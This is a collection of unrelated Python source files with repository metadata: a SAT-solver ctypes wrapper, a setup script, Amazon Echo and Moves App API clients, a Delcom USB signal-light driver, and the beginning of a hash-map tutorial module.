Solve arbitrary subsets of CNF+ instances and find SAT subsets / UNSAT cores.
"""
import array
import os
import ctypes
from abc import ABCMeta, abstractmethod
from ctypes import c_void_p, c_ubyte, c_bool, c_int
class Solver(object):
"""The Solver class is an abstract base class for MiniSat and
MiniCard solver classes. It provides the basic methods that both
contain, closely following the methods in MiniSat and MiniCard's
Solver class.
Solver should not be instantiated directly. Instead, use its
subclasses MinisatSolver, MinicardSolver, MinisatSubsetSolver, or
MinicardSubsetSolver (see below).
"""
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, libfilename):
self._setup_lib(libfilename)
self.s = self.lib.Solver_new()
def _setup_lib(self, libfilename):
"""Load the minisat library with ctypes and create a Solver
object. Correct return types (if not int as assumed by
ctypes) and set argtypes for functions from the minisat
library.
"""
dirname = os.path.dirname(os.path.abspath(__file__))
libfile = dirname + '/' + libfilename
if not os.path.exists(libfile):
raise IOError("Specified library file not found. Did you run 'make' to build the solver libraries?\nFile not found: %s" % libfile)
self.lib = ctypes.cdll.LoadLibrary(dirname+'/'+libfilename)
l = self.lib
l.Solver_new.restype = c_void_p
l.Solver_new.argtypes = []
l.Solver_delete.argtypes = [c_void_p]
l.nVars.argtypes = [c_void_p]
l.nClauses.argtypes = [c_void_p]
l.setPhaseSaving.argtypes = [c_void_p, c_int]
l.setRndPol.argtypes = [c_void_p, c_bool]
l.newVar.argtypes = [c_void_p, c_ubyte, c_bool]
l.addClause.restype = c_bool
l.addClause.argtypes = [c_void_p, c_int, c_void_p]
l.addUnit.restype = c_bool
l.addUnit.argtypes = [c_void_p, c_int]
l.solve.restype = c_bool
l.solve.argtypes = [c_void_p]
l.solve_assumptions.restype = c_bool
l.solve_assumptions.argtypes = [c_void_p, c_int, c_void_p]
l.simplify.restype = c_bool
l.simplify.argtypes = [c_void_p]
l.unsatCore.argtypes = [c_void_p, c_int, c_void_p]
l.modelValue.argtypes = [c_void_p, c_int]
l.fillModel.argtypes = [c_void_p, c_void_p, c_int, c_int]
l.getModelTrues.restype = c_int
l.getModelTrues.argtypes = [c_void_p, c_void_p, c_int, c_int]
l.getImplies.argtypes = [c_void_p, c_void_p]
l.getImplies.restype = c_int
def __del__(self):
"""Delete the Solver object"""
self.lib.Solver_delete(self.s)
@staticmethod
def _to_intptr(a):
"""Helper function to get a ctypes POINTER(c_int) for an array"""
addr, size = a.buffer_info()
return ctypes.cast(addr, ctypes.POINTER(c_int)), size
def new_var(self, polarity=None, dvar=True):
"""Create a new variable in the solver.
Args:
polarity (bool):
The default polarity for this variable. True = variable's
default is True, etc. Note that this is the reverse of the 'user
polarity' in MiniSat, where True indicates the *sign* is True,
hence the default value is False.
dvar (bool):
Whether this variable will be used as a decision variable.
Returns:
The new variable's index (0-based counting).
"""
if polarity is None:
pol_int = 2
elif polarity is True:
pol_int = 1
elif polarity is False:
pol_int = 0
return self.lib.newVar(self.s, pol_int, dvar)
def nvars(self):
'''Get the number of variables created in the solver.'''
return self.lib.nVars(self.s)
def nclauses(self):
'''Get the number of clauses or constraints added to the solver.'''
return self.lib.nClauses(self.s)
def set_phase_saving(self, ps):
'''Set the level of phase saving (0=none, 1=limited, 2=full (default)).'''
self.lib.setPhaseSaving(self.s, ps)
def set_rnd_pol(self, val):
'''Set whether random polarities are used for decisions (overridden if vars are created with a user polarity other than None)'''
self.lib.setRndPol(self.s, val)
def add_clause(self, lits):
"""Add a clause to the solver.
Args:
lits:
A list of literals as integers. Each integer specifies a
variable with *1*-based counting and a sign via the sign of the
integer. Ex.: [-1, 2, -3] is (!x0 + x1 + !x2)
Returns:
A boolean value returned from MiniSat's ``addClause()`` function,
indicating success (True) or conflict (False).
"""
if not all(abs(x) <= self.nvars() for x in lits):
raise Exception("Not all variables in %s are created yet. Call new_var() first." % lits)
if len(lits) > 1:
a = array.array('i', lits)
a_ptr, size = self._to_intptr(a)
return self.lib.addClause(self.s, size, a_ptr)
elif len(lits) == 1:
return self.lib.addUnit(self.s, lits[0])
else:
return self.lib.addClause(self.s, 0, None)
def solve(self, assumptions=None):
"""Solve the current set of clauses, optionally with a set of assumptions.
Args:
assumptions:
An optional iterable returning literals as integers, specified as
in ``add_clause()``.
Returns:
True if the clauses (and assumptions) are satisfiable, False otherwise.
"""
if assumptions is None:
return self.lib.solve(self.s)
else:
a = array.array('i', assumptions)
a_ptr, size = self._to_intptr(a)
return self.lib.solve_assumptions(self.s, size, a_ptr)
def simplify(self):
'''Call Solver.simplify().'''
return self.lib.simplify(self.s)
def get_model(self, start=0, end=-1):
"""Get the current model from the solver, optionally retrieving only a slice.
Args:
start, end (int):
Optional start and end indices, interpreted as in ``range()``.
Returns:
An array of booleans indexed to each variable (from 0). If a start
index was given, the returned list starts at that index (i.e.,
``get_model(10)[0]`` is index 10 from the solver's model.
"""
if end == -1:
end = self.nvars()
a = array.array('i', [-1] * (end-start))
a_ptr, size = self._to_intptr(a)
self.lib.fillModel(self.s, a_ptr, start, end)
return a
def get_model_trues(self, start=0, end=-1):
"""Get variables assigned true in the current model from the solver.
Args:
start, end (int):
Optional start and end indices, interpreted as in ``range()``.
Returns:
An array of true variables in the solver's current model. If a
start index was given, the variables are indexed from that value.
"""
if end == -1:
end = self.nvars()
a = array.array('i', [-1] * (end-start))
a_ptr, size = self._to_intptr(a)
count = self.lib.getModelTrues(self.s, a_ptr, start, end)
# reduce the array down to just the valid indexes
return a[:count]
def model_value(self, i):
'''Get the value of a given variable in the current model.'''
return self.lib.modelValue(self.s, i)
def implies(self):
"""Get literals known to be implied by the current formula. (I.e., all
assignments made at level 0.)
Returns:
An array of literals.
"""
a = array.array('i', [-1] * self.nvars())
a_ptr, size = self._to_intptr(a)
count = self.lib.getImplies(self.s, a_ptr)
# reduce the array down to just the valid indexes
return a[:count]
class SubsetMixin(object):
"""A mixin for any Solver class that lets it reason about subsets of a clause set."""
_origvars = None
_relvars = None
def set_varcounts(self, vars, constraints):
"""Record how many of the solver's variables and clauses are
"original," as opposed to clause-selector variables, etc.
"""
self._origvars = vars
self._relvars = constraints
def add_clause_instrumented(self, lits, index):
"""Add a "soft" clause with a relaxation variable (the relaxation var.
is based on the index, which is assumed to be 0-based).
Args:
lits:
A list of literals specified as in ``add_clause()``.
index (int):
A 0-based index into the set of soft clauses. The clause will
be given a relaxation variable based on this index, and it will
be used to specify the clause in subsets for
``solve_subset()``, etc.
"""
if self._origvars is None:
raise Exception("SubsetSolver.set_varcounts() must be called before .add_clause_instrumented()")
instrumented_clause = [-(self._origvars+1+index)] + lits
self.add_clause(instrumented_clause)
def solve_subset(self, subset):
"""Solve a subset of the constraints equal containing all "hard"
clauses (those added with the regular ``add_clause()`` method) and the
specified subset of soft clauses.
Args:
subset:
An iterable containing the indexes of any soft clauses to be included.
Returns:
True if the given subset is satisfiable, False otherwise.
"""
if self._origvars is None:
raise Exception("SubsetSolver.set_varcounts() must be called before .solve_subset()")
# convert clause indices to clause-selector variable indices
a = array.array('i', (i+self._origvars+1 for i in subset))
a_ptr, size = self._to_intptr(a)
return self.lib.solve_assumptions(self.s, size, a_ptr)
def unsat_core(self):
"""Get an UNSAT core from the last check performed by
``solve_subset()``. Assumes the last such check was UNSAT.
"""
a = array.array('i', [-1] * self.nclauses())
a_ptr, size = self._to_intptr(a)
length = self.lib.unsatCore(self.s, self._origvars, a_ptr)
# reduce the array down to just the valid indexes
return a[:length]
def sat_subset(self):
"""Get the set of clauses satisfied in the last check performed by
``solve_subset()``. Assumes the last such check was SAT. This may
contain additional soft clauses not in the subset that was given to
``solve_subset()``, if they were also satisfied by the model found.
"""
return self.get_model_trues(start=self._origvars, end=self._origvars+self._relvars)
class MinisatSolver(Solver):
"""A Python analog to MiniSat's Solver class.
>>> S = MinisatSolver()
Create variables using ``new_var()``. Add clauses as list of literals with
``add_clause()``, analogous to MiniSat's ``add_clause()``. Literals are
specified as integers, with the magnitude indicating the variable index
(with 1-based counting) and the sign indicating True/False. For example,
to add clauses (x0), (!x1), (!x0 + x1 + !x2), and (x2 + x3):
>>> for i in range(4):
... S.new_var() # doctest: +ELLIPSIS
0
1
2
3
>>> for clause in [1], [-2], [-1, 2, -3], [3, 4]:
... S.add_clause(clause) # doctest: +ELLIPSIS
True
True
True
True
The ``solve()`` method returns True or False just like MiniSat's.
>>> S.solve()
True
Models are returned as arrays of Booleans, indexed by var.
So the following represents x0=True, x1=False, x2=False, x3=True.
>>> list(S.get_model())
[1, 0, 0, 1]
The ``add_clause()`` method may return False if a conflict is detected
when adding the clause, even without search.
>>> S.add_clause([-4])
False
>>> S.solve()
False
"""
def __init__(self):
super(MinisatSolver, self).__init__("libminisat.so")
class MinicardSolver(Solver):
"""A Python analog to MiniCard's Solver class.
>>> S = MinicardSolver()
This has the same interface as :class:`MiniSatSolver`, with the addition of
the ``add_atmost()`` method.
>>> for i in range(4):
... S.new_var() # doctest: +ELLIPSIS
0
1
2
3
>>> for clause in [1], [-2], [3, 4]:
... S.add_clause(clause)
True
True
True
To add an AtMost constraint, specify the set of literals and the bound. For example, to add AtMost({x0, !x1, x2}, 2):
>>> S.add_atmost([1,-2,3], 2)
True
>>> S.solve()
True
>>> list(S.get_model())
[1, 0, 0, 1]
As with ``add_clause()``, the ``add_atmost()`` method may return False if a
conflict is detected when adding the constraint, even without search.
>>> S.add_atmost([1,-3,4], 2)
False
>>> S.solve()
False
"""
def __init__(self):
super(MinicardSolver, self).__init__("libminicard.so")
def _setup_lib(self, libfilename):
"""Correct return types (if not int as assumed by ctypes) and set argtypes for
functions from the minicard library.
"""
super(MinicardSolver, self)._setup_lib(libfilename)
# additional function for minicard
l = self.lib
l.addAtMost.restype = c_bool
l.addAtMost.argtypes = [c_void_p, c_int, c_void_p, c_int]
def add_atmost(self, lits, k):
"""Add an AtMost constraint to the solver.
Args:
lits:
A list of literals as integers. Each integer specifies a
variable with **1**-based counting and a sign via the sign of
the integer. Ex.: [-1, 2, -3] is {!x0, x1, !x2}
k (int):
The [upper] bound to place on these literals.
Returns:
A boolean value returned from MiniCard's ``addAtMost()``
function, indicating success (True) or conflict (False).
"""
if not all(abs(x) <= self.nvars() for x in lits):
raise Exception("Not all variables in %s are created yet. Call new_var() first." % lits)
if len(lits) > 1:
a = array.array('i', lits)
a_ptr, size = self._to_intptr(a)
return self.lib.addAtMost(self.s, size, a_ptr, k)
else:
return self.lib.addAtMost(self.s, 0, None, 0)
class MinisatSubsetSolver(SubsetMixin, MinisatSolver):
"""A class for reasoning about subsets of constraints within MiniSat.
>>> S = MinisatSubsetSolver()
It must be told explicitlyhow many of its variables are "real" and how many
are relaxation variables for constraints.
>>> S.set_varcounts(vars = 4, constraints = 5)
>>> for i in range(4+5):
... _ = S.new_var()
"Soft" clauses are added with ``add_clause_instrumented()``, which has no
return value, as it is impossible for these clauses to produce a conflict.
>>> for i, clause in enumerate([[1], [-2], [-1, 2, 3], [-3], [-1]]):
... S.add_clause_instrumented(clause, i)
Any subset of the constraints can be tested for satisfiability. Subsets
are specified as iterables containing soft clause indexes.
>>> S.solve_subset([0,1,2])
True
If a subset is found to be satisfiable, a potentially larger satisfied
subset can be found. Satisfiable subsets are returned as array objects.
>>> satset = S.sat_subset()
>>> sorted(satset)
[0, 1, 2]
If a subset is found to be unsatisfiable, an UNSAT core can be found.
Cores are returned as array objects.
>>> S.solve_subset([0,1,2,3])
False
>>> core = S.unsat_core()
>>> sorted(core)
[0, 1, 2, 3]
"""
pass
class MinicardSubsetSolver(SubsetMixin, MinicardSolver):
"""A class for reasoning about subsets of constraints within MiniCard.
This has the same interface as :class:`MinisatSubsetSolver`, with the
addition of the ``add_atmost()`` method.
>>> S = MinicardSubsetSolver()
>>> S.set_varcounts(vars = 4, constraints = 4)
>>> for i in range(4+4):
... _ = S.new_var()
>>> for i, clause in enumerate([[1], [-2], [3], [4]]):
... S.add_clause_instrumented(clause, i)
AtMost constraints cannot be instrumented -- they must be hard constraints.
>>> S.add_atmost([1,-2,3], 2)
True
>>> S.solve_subset([0,1])
True
>>> S.solve_subset([0,1,2,3])
False
>>> core = S.unsat_core()
>>> sorted(core)
[0, 1, 2]
"""
pass
| {
"repo_name": "tejasnikumbh/AllSAT",
"path": "minisolvers.py",
"copies": "3",
"size": "17517",
"license": "mit",
"hash": -910697848038940400,
"line_mean": 33.013592233,
"line_max": 143,
"alpha_frac": 0.5964491637,
"autogenerated": false,
"ratio": 3.6947901286648386,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.000531528476147044,
"num_lines": 515
} |
"""A Python backport of CMU Twokenize.
"""
import os
try:
from setuptools import setup
except ImportError:
from distutils import setup
from distutils.command.clean import clean as Clean
import shutil
import subprocess
############################
# Distribution details
############################
DISTNAME = 'twokenize_py'
PACKAGE_NAME = 'twokenize_py'
DESCRIPTION = 'Python backport of Twokenize.'
MAINTAINER = 'Neville Ryant'
MAINTAINER_EMAIL = 'nryant@gmail.com'
URL = 'https://github.com/nryant/twokenize_py'
LICENSE = 'Apache 2.0'
VERSION = '0.5'
###########################
# Clean command
###########################
REMOVE_EXTENSIONS = set(['.pyc', '.pyd', '.so', '.dll', ])
class CleanCommand(Clean):
def run(self):
Clean.run(self)
if os.path.exists('build'):
shutil.rmtree('build')
eggf = '%s.egg-info' % PACKAGE_NAME
if os.path.exists(eggf):
shutil.rmtree(eggf)
for dirpath, dirnames, fns in os.walk(PACKAGE_NAME):
for fn in fns:
ext = os.path.splitext(fn)[1]
if ext in REMOVE_EXTENSIONS:
os.remove(os.path.join(dirpath, fn))
############################
# Setup
############################
def get_packages():
packages = []
for dirpath, dirnames, fns in os.walk(PACKAGE_NAME):
if os.path.basename(dirpath) == 'tests':
continue
if os.path.isfile(os.path.join(dirpath, '__init__.py')):
package = dirpath.replace(os.path.sep, '.')
packages.append(package)
return packages
def get_full_version():
if os.path.exists('.git'):
git_revision = get_git_revision()
full_version = VERSION + '.dev-' + git_revision[:7]
else:
full_version = VERSION
return full_version
def get_git_revision():
"""Return current revision.
"""
def _minimal_ext_cmd(cmd):
# Construct minimal environment.
env = {}
for k in ['SYSTEMROOT', 'PATH']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C;'
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env)
stdout = p.communicate()[0]
return stdout
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
git_revision = out.strip().decode('ascii')
except OSError:
git_revision = "Unknown"
return git_revision
def write_version_py(fn, version):
"""
"""
with open(fn, 'wb') as f:
f.write("version = '%s'\n" % version)
def setup_package():
version = get_full_version()
write_version_py(os.path.join(PACKAGE_NAME, 'version.py'), version)
setup(name=DISTNAME,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
description=DESCRIPTION,
license=LICENSE,
url=URL,
version=version,
packages = get_packages(),
cmdclass={'clean': CleanCommand},
)
if __name__ == '__main__':
setup_package()
| {
"repo_name": "nryant/twokenize_py",
"path": "setup.py",
"copies": "1",
"size": "3162",
"license": "apache-2.0",
"hash": 3856408247909985000,
"line_mean": 25.7966101695,
"line_max": 71,
"alpha_frac": 0.5477545857,
"autogenerated": false,
"ratio": 3.6853146853146854,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47330692710146854,
"avg_score": null,
"num_lines": null
} |
# A Python class for connection to the Amazon Echo API
# By Scott Vanderlind, December 31 2014
import requests, json, urllib, cookielib
from bs4 import BeautifulSoup
class PyEcho:
url = "https://pitangui.amazon.com"
email = ""
password = ""
session = False
loginsuccess = False
csrf = "-2092727538"
def __init__(self, email, password):
self.email = email
self.password = password
self.session = requests.Session()
self.login()
## Log in to the Amazon Echo API
def login(self):
print "logging in..."
# Get the login page and retrieve our form action.
loginPage = self.get("")
loginSoup = BeautifulSoup(loginPage.text)
form = loginSoup.find('form')
action = form.get('action')
# Create our parameter payload
parameters = {}
# let's not forget our email and password
parameters['email'] = self.email
parameters['password'] = self.password
parameters['create'] = "0"
# We need to keep the hidden fields around
hidden = form.find_all(type="hidden")
for el in hidden:
parameters[el['name']] = el['value']
# Set up the headers for the request
headers = self.getHeaders()
headers['Referer'] = self.url
# Now, we can create a new post request to log in
login = self.session.post(action, data=parameters, headers=headers)
if 'x-amzn-requestid' not in login.headers:
print "Error logging in! Got status " + str(login.status_code)
self.loginsuccess = False
else:
print "Login success!"
self.loginsuccess = True
def tasks(self):
params = {'type':'TASK', 'size':'10'}
tasks = self.get('/api/todos', params)
return json.loads(tasks.text)['values']
def shoppingitems(self):
params = {'type':'SHOPPING_ITEM', 'size':'10'}
items = self.get('/api/todos', params)
return json.loads(items.text)['values']
def deleteTask(self, task):
task['deleted'] = True
return self.put('/api/todos/' + urllib.quote_plus(task['itemId']), task)
def deleteShoppingItem(self, item):
item['deleted'] = True
return self.put('/api/todos/' + urllib.quote_plus(item['itemId']), item)
def devices(self):
devices = self.get('/api/devices/device')
return json.loads(devices.text)['devices']
def cards(self):
params = {'limit':'10'}
cards = self.get('/api/cards', params)
return json.loads(cards.text)['cards']
def notifications(self):
notes = self.get('/api/notifications')
return json.loads(notes.text)['notifications']
def services(self):
services = self.get('/api/third-party')
return json.loads(services.text)['services']
def preferences(self):
prefs = self.get('/api/device-preferences')
return json.loads(prefs.text)['devicePreferences']
def wakeWords(self):
words = self.get('/api/wake-word')
return json.loads(words.text)['wakeWords']
#####
## Helper functions are below
#####
## Make an authenticated GET request
def get(self, url, data=False):
headers = self.getHeaders()
return self.session.get(self.url + url, headers=headers, params=data)
## Make an authenticated PUT request
def put(self, url, payload):
headers = self.getHeaders()
headers['Content-type'] = 'application/json'
headers['csrf'] = self.getCsrfCookie()
headers['Accept'] = 'application/json, text/javascript, */*; q=0.01'
return self.session.put(url=self.url + url, data=json.dumps(payload), headers=headers)
## Fetch the CSRF token from the cookie jar, set by the server.
## CookieLib's documentation is really not great, at least that I could find
## so in order to get our csrf token from the cookie, we have to iterate
## over the jar and match by name. Fine. Whatever.
def getCsrfCookie(self):
for cookie in self.session.cookies:
if cookie.name == "csrf":
return cookie.value
## Prepare common headers that we send with all requests.
def getHeaders(self):
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A'
headers['Charset'] = 'utf-8'
headers['Origin'] = 'http://echo.amazon.com'
headers['Referer'] = 'http://echo.amazon.com/spa/index.html'
return headers
| {
"repo_name": "peterhajas/control",
"path": "alexa/PyEcho/PyEcho.py",
"copies": "1",
"size": "4485",
"license": "bsd-2-clause",
"hash": 5594839120860065000,
"line_mean": 32.7218045113,
"line_max": 151,
"alpha_frac": 0.6327759197,
"autogenerated": false,
"ratio": 3.81053525913339,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.494331117883339,
"avg_score": null,
"num_lines": null
} |
# A python class for easy access to the Moves App data. Created by Joost Plattel [http://github.com/jplattel]
import requests
import logging
class Moves():
def __init__(self, client_id, client_secret, redirect_url, \
api_url = 'https://api.moves-app.com/oauth/v1/'):
self.client_id = client_id # Client ID, get this by creating an app
self.client_secret = client_secret # Client Secret, get this by creating an app
self.redirect_url = redirect_url # Callback URL for getting an access token
self.api_url = api_url
# Generate an request URL
def request_url(self):
u = 'https://api.moves-app.com/oauth/v1/authorize?response_type=code'
c = '&client_id=' + self.client_id
s = '&scope=' + 'activity location' # Assuming we want both activity and locations
url = u + c + s
return url # Open this URL for the PIN, then authenticate with it and it will redirect you to the callback URL with a request-code, specified in the API access.
# Get access_token
def auth(self, request_token):
c = '&client_id=' + self.client_id
r = '&redirect_uri=' + self.redirect_url
s = '&client_secret=' + self.client_secret
j = requests.post(self.api_url + 'access_token?grant_type=authorization_code&code=' + request_token + c + s + r)
logging.debug(j.content)
self.access_json = j.json()
token = self.access_json['access_token']
return token
# Standard GET and profile requests
# Base request
def get(self, token, endpoint):
token = '?access_token=' + token
return requests.get(self.api_url + endpoint + token).json()
# /user/profile
def get_profile(self, token):
token = '?access_token=' + token
root = '/user/profile'
return requests.get(self.api_url + root + token).json()
# Summary requests
# /user/summary/daily/<date>
# /user/summary/daily/<week>
# /user/summary/daily/<month>
def get_summary(self, token, date):
token = '?access_token=' + token
return requests.get(self.api_url + '/user/summary' + date + token).json()
# Range requests, max range of 7 days!
# /user/summary/daily?from=<start>&to=<end>
# /user/activities/daily?from=<start>&to=<end>
# /user/places/daily?from=<start>&to=<end>
# /user/storyline/daily?from=<start>&to=<end>
def get_range(self, access_token, endpoint, start, end):
export = get(access_token, endpoint + '?from=' + start + '&to=' + end)
return export
| {
"repo_name": "sdsingh/e-mission-server",
"path": "CFC_WebApp/main/moves.py",
"copies": "1",
"size": "2513",
"license": "bsd-3-clause",
"hash": 6648142861108258000,
"line_mean": 37.0757575758,
"line_max": 166,
"alpha_frac": 0.643454039,
"autogenerated": false,
"ratio": 3.4854368932038833,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4628890932203883,
"avg_score": null,
"num_lines": null
} |
# A python class for easy access to the Moves App data. Created by Joost Plattel [http://github.com/jplattel]
import requests
class Moves():
def __init__(self, client_id, client_secret, redirect_url, \
auth_url = 'https://api.moves-app.com/oauth/v1/', \
api_url = 'https://api.moves-app.com/api/1.1/'):
self.client_id = client_id # Client ID, get this by creating an app
self.client_secret = client_secret # Client Secret, get this by creating an app
self.redirect_url = redirect_url # Callback URL for getting an access token
self.api_url = api_url
# Generate an request URL
def request_url(self):
u = 'https://api.moves-app.com/oauth/v1/authorize?response_type=code'
c = '&client_id=' + self.client_id
s = '&scope=' + 'activity location' # Assuming we want both activity and locations
url = u + c + s
return url # Open this URL for the PIN, then authenticate with it and it will redirect you to the callback URL with a request-code, specified in the API access.
# Get access_token
def auth(self, request_token):
c = '&client_id=' + self.client_id
r = '&redirect_uri=' + self.redirect_url
s = '&client_secret=' + self.client_secret
j = requests.post(self.auth_url + 'access_token?grant_type=authorization_code&code=' + request_token + c + s + r)
self.access_json = j.json()
token = self.access_json['access_token']
return token
# Standard GET and profile requests
# Base request
def get(self, token, endpoint):
if ('?' in endpoint):
tokenSep = '&'
else:
tokenSep = '?'
token = tokenSep + 'access_token=' + token
response = requests.get(self.api_url + endpoint + token)
try:
response.raise_for_status();
return response.json()
except requests.exceptions.HTTPError as e:
print "Got HTTP error %s " % e
return []
except:
print "Unable to decode response %s with code %s" % (response.text, response.status_code)
return []
# /user/profile
def get_profile(self, token):
token = '?access_token=' + token
root = 'user/profile'
response = requests.get(self.api_url + root + token)
try:
return response.json()
except:
print "Unable to decode response %s" % response.text
return None
# Summary requests
# /user/summary/daily/<date>
# /user/summary/daily/<week>
# /user/summary/daily/<month>
def get_summary(self, token, date):
token = '?access_token=' + token
return requests.get(self.api_url + '/user/summary' + date + token).json()
# Range requests, max range of 7 days!
# /user/summary/daily?from=<start>&to=<end>
# /user/activities/daily?from=<start>&to=<end>
# /user/places/daily?from=<start>&to=<end>
# /user/storyline/daily?from=<start>&to=<end>
def get_range(self, access_token, endpoint, start, end):
export = get(access_token, endpoint + '?from=' + start + '&to=' + end)
return export
| {
"repo_name": "sdsingh/e-mission-server",
"path": "CFC_DataCollector/moves/moves.py",
"copies": "3",
"size": "2987",
"license": "bsd-3-clause",
"hash": 5482749147572457000,
"line_mean": 34.9879518072,
"line_max": 166,
"alpha_frac": 0.6401071309,
"autogenerated": false,
"ratio": 3.4293915040183696,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5569498634918371,
"avg_score": null,
"num_lines": null
} |
# A python class for the Delcom USBLMP 904x multi-color visual signal indicator. This
# has been tested with the 904007-SB but should work with most of the other
# indicators.
#
# Requires the Signal 11 HIDAPI and cython-hidapi.
#
# Copyright (c) 2019 Aaron Linville <aaron@linville.org>
import hid
vendor_id = 0x0FC5
product_id = 0xB080
green = 1
red = 2
blue = 4
def list():
"""Lists all the Delcom USBLMP 904x devices"""
for d in hid.enumerate(vendor_id, product_id):
for key in sorted(d.keys()):
print(f"{key} : {d[key]}")
print()
class DelcomMultiColorIndicator:
"""A python class for the Delcom USBLMP 904x Multi-color Visual Signal Indicators."""
# Command Packet Format:
# Byte 0 - Major Command
# Byte 1 - Minor Command
# Byte 2 - Data LSB
# Byte 3 - Data MSB
# Bytes 4-8 - Data HID
# Bytes 8-16 - Data External (Optional)
def __init__(self):
"""Constructs and attempts to attach to any available Delcom 904x Multi-Color
Visual Indicator."""
try:
self.h = hid.device()
self.h.open(vendor_id, product_id) # Vendor Id, Product Id
self.reset()
except OSError as e:
print(f"Failed: {e}")
raise
def info(self):
"""Prints out all the USB, firmware and current configuration
on the attached multi-color indicator."""
print(f"USB Manufacturer Id: {self.h.get_manufacturer_string()}")
print(f"USB Product Id: {self.h.get_product_string()}")
print(f"USB Serial Id: {self.h.get_serial_number_string()}")
data = self.h.get_feature_report(10, 8)
print("Serial: %s" % (data[3] << 32 | data[2] << 16 | data[1] << 8 | data[0]))
print(f"Firmware version: {data[5]}")
print(f"Firmware date: {data[7] + 2000}, {data[6]}, {data[5]}")
data = self.h.get_feature_report(100, 4)
print("Port 0:", data[0])
print("Port 1:", data[1])
str = []
if ~data[1] & green:
str.append("Green")
if ~data[1] & red:
str.append("Red")
if ~data[1] & blue:
str.append("Blue/Yellow")
if data[1] == 255:
str.append("None")
print(f" Enabled colors: {','.join(str)}")
print("Port 1 Clock Enable Status:", data[2])
print("Port 2:", data[3])
def reset(self):
"""Turns off all the LEDs and Buzzers."""
self.set_color(0)
self.disable_buzzer()
def set_color(self, colors, flashing=False, cycle_time=0):
"""Enables the colors with optional flashing or color cycling."""
self.h.write([101, 12, colors, 0xFF])
# If flash is not enabled, ensure it's disabled.
if flashing or cycle_time > 0:
self.h.write([101, 20, ~colors & 0xFF, colors])
else:
self.h.write([101, 20, 0xF, 0x0])
if cycle_time > 0:
# Syncronize clock generation
delay = 0
off_time = bin(colors).count("1") * cycle_time - cycle_time
if colors & green:
# print(f"Cycle green: {cycle_time}, {delay}, {off_time}")
self.__set_duty_cycle(0, cycle_time, off_time)
self.__set_phase_delay(0, delay)
delay += cycle_time
if colors & red:
# print(f"Cycle red: {cycle_time}, {delay}, {off_time}")
self.__set_duty_cycle(1, cycle_time, off_time)
self.__set_phase_delay(1, delay)
delay += cycle_time
if colors & blue:
# print(f"Cycle blue: {cycle_time}, {delay}, {off_time}")
self.__set_duty_cycle(2, cycle_time, off_time)
self.__set_phase_delay(2, delay)
delay += cycle_time
self.h.write(
[101, 25, colors, 0] # Selected on pins
) # No initial phase delay
else:
self.h.write([101, 25, 0xF, 0]) # All pins # No initial phase delay
def __set_duty_cycle(self, color_pin, on_time, off_time):
"""Internal method to set the duty cycle on a pin, used for color cycling."""
self.h.write(
[
101,
21 + color_pin, # Pin to set duty cycle on
off_time, # High duty cycle
on_time,
]
) # Low duty cycle
def __set_phase_delay(self, color_pin, delay_time):
"""Internal method to set the initial delay on a pin, used for color cycling."""
self.h.write(
[
101,
26 + color_pin, # Pin to delay turning on
delay_time, # High duty cycle
0x0,
]
)
def set_intensity(self, intensity, colors):
"""Sets the intensity of a color using pulse-width modulation (0-100 %)."""
self.h.write([101, 34, colors, intensity])
def disable_buzzer(self):
"""Disables the buzzer."""
self.h.write(
[
102,
70,
0x0, # Disable Buzzer
0x0, # Frequency
0x0,
0x0,
0x0,
0x0,
0,
0, # Duty cycle (on), 50 ms units
0, # Duty cycle (off), 50 ms units
0x0,
0x0,
0x0,
0x0,
0x0,
]
)
def enable_buzzer(self, freq, duty_on, duty_off, repeat):
"""Enables the buzzer with a duty cycle and repetition. Frequency is currently
hardcoded."""
self.h.write(
[
102,
70,
0x1, # Enable Buzzer
0x4, # Frequency
0x0,
0x0,
0x0,
0x0,
repeat,
int(duty_on / 50), # Duty cycle (on), 50 ms units
int(duty_off / 50), # Duty cycle (off), 50 ms units
0x0,
0x0,
0x0,
0x0,
0x0,
]
)
| {
"repo_name": "linville/delcom904x",
"path": "delcom904x.py",
"copies": "1",
"size": "6254",
"license": "isc",
"hash": 2960943801907454000,
"line_mean": 29.6568627451,
"line_max": 89,
"alpha_frac": 0.493284298,
"autogenerated": false,
"ratio": 3.642399534071054,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9633126989504862,
"avg_score": 0.0005113685132383886,
"num_lines": 204
} |
"""A python class library for creating something called a hash map that
is capable of storing name value pairs in a data structure that is
efficient to retrieve values based on provided names.
This rendition only allows a single value for each name.
"""
# This first function is an initializer
def new(num_buckets=256):
"""Initializes a Map with the given number of buckets. Default = 256 buckets"""
aMap = []
for i in range(0, num_buckets):
aMap.append([])
#Results in aMap = [[], [], [], ... ] (a list of empty lists)
return aMap
def hash_key(aMap, key):
"""Given a key, this will create a number and then convert it to an index for the aMap's buckets."""
# hash the key then modulo the resulting int by the number of available buckets.
# this ensures very large numbers can still be distributed among a smaller
# number of buckets.
# len gets the number of items (buckets) in the provided hash map (aMap)
return hash(key) % len(aMap)
def get_bucket(aMap, key):
"""Given a key, find the bucket where it would go."""
# get the bucket id for a particular aMap object based on key
bucket_id = hash_key(aMap, key)
# return the list item (bucket) referenced by the bucket_id
return aMap[bucket_id]
def get_slot(aMap, key, default=None):
"""
Returns the index, key, and a value of a slot found in a bucket.
Returns -1, key, and default (None if not set) when not found.
"""
bucket = get_bucket(aMap, key)
#for lists, enumerate returns each indices followed by the contents found at that index.
#the bucket is a list of lists. The lists contained are empty or contain tuples with a name value pair.
for i, kv in enumerate(bucket):
k, v = kv
if key == k:
#found the key!
return i, k, v
# guess we didn't find the key after going through all in this bucket.
